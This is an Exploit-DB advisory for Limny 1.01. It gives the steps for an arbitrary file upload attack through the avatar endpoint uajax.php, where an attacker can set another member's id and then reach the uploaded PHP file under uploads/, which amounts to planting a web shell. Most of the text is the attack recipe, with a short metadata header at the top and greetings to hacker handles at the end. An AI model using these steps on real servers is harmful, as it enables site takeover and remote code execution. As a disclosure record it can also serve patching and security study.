Limny 1.01 - Arbitrary File Upload

EDB-ID:

11377

CVE:



Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2010-02-09


----------[exploit Debut]
[Remote File Upload Vulnerability]
----------[Script Info]

Moi    : JIKO
Site    : No-exploit.Com
Email    : :(

----------[Script Info]

Site:http    : limny.org

----------[exploit Info]

1]~[3 Action]
    the first setup register if the register active
http://server/Path/
    the second setup go to edit your  avatar
http://server/limny/uajax.php?page=avatar&id=[ your ID or id for a member you can change here avatar]
    now go to
path/uploads/[your file || jawa.php]

----------[Thanks]
  HxH, Cyb3r-DeViL, The Sadhacker, kasper,  SkuLL-HacKeR Member No-exploit.Com,all friends
----------[exploit Fin]